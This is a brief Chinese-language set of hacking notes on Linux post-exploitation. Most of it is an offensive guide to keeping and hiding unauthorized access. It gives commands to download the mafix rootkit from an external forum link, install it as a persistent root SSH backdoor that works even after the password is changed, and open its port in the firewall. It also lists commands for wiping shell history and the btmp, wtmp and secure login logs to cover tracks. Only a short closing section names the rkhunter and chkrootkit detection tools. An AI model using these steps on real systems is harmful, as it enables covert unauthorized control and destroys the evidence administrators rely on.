后門
(1)開機自動反彈shell
(2)linux后門
Rookit
目前常用的有:t0rn /mafix/enyelkm 等
mafix rootkit
Mafix是一款常用的輕量應用級別Rootkits,是通過偽造ssh協議漏洞實現遠程登陸的特點是配置簡單並可以自定義驗證密碼和端口號。
URL:http://forum.eviloctal.com/attachment.php?aid=13419
注意:在某些linux發行版上可能會遇到問題導致功能問題
安裝及使用: wget http://forum.eviloctal.com/attachment.php?aid=13419 tar zvxf mafix.tar.gz cd mafix chmod +x root ./root pass port
安裝完成后,使用ssh 用戶@IP -P 配置的端口,即可遠程登錄。
netstat -tnl 也驗證端口是開放的。之前解壓文件的目錄/home/mafix在編譯完后自動消失,便於隱藏。
現在就可以用root,加上新密碼、端口進行登錄了,即使管理員改了root的密碼也可以登錄。
若無法登錄,檢查Linux的防火牆是否關閉,或者是否把新端口加入iptables中:
iptables -A RH-Firewall-1-INPUT -m state --state NEW -m tcp -p tcp --dport 端口 -j ACCEPT
痕跡清理
清理命令記錄:
(1)僅清理當前用戶: history -c
(2)使系統不再保存命令記錄:vi /etc/profile,找到HISTSIZE這個值,修改為0
(3)刪除記錄
刪除登錄失敗記錄:echo > /var/log/btmp 刪除登錄成功記錄:echo > /var/log/wtmp (此時執行last命令就會發現沒有記錄) 刪除日志記錄:echo > /var/log/secure
安全檢測
Rkhunter
Rkhunter的中文名叫“Rootkit獵手”, 目前可以發現大多數已知的rootkits和一些嗅探器以及后門程序. 它通過執行一系列的測試腳本來確認服務器是否已經感染rootkits. 比如檢查rootkits使用的基本文件, 可執行二進制文件的錯誤文件權限, 檢測內核模塊等等。
Chkrootkit
當然如果只是用Rkhunter檢查掃描還是不夠權威,再來安裝一款檢查下吧,chkrootkit 是一款小巧易用的Unix平台上的可以檢測多種rootkit入侵的工具。它的功能包括檢測文件修改、utmp/wtmp/last日志修改、界面欺騙(promiscuous interfaces)、惡意核心模塊(maliciouskernel modules)。
相關鏈接
http://www.freebuf.com/articles/network/23665.html
http://www.myhack58.com/Article/html/3/8/2011/29132.htm
http://www.tuicool.com/articles/eIv22az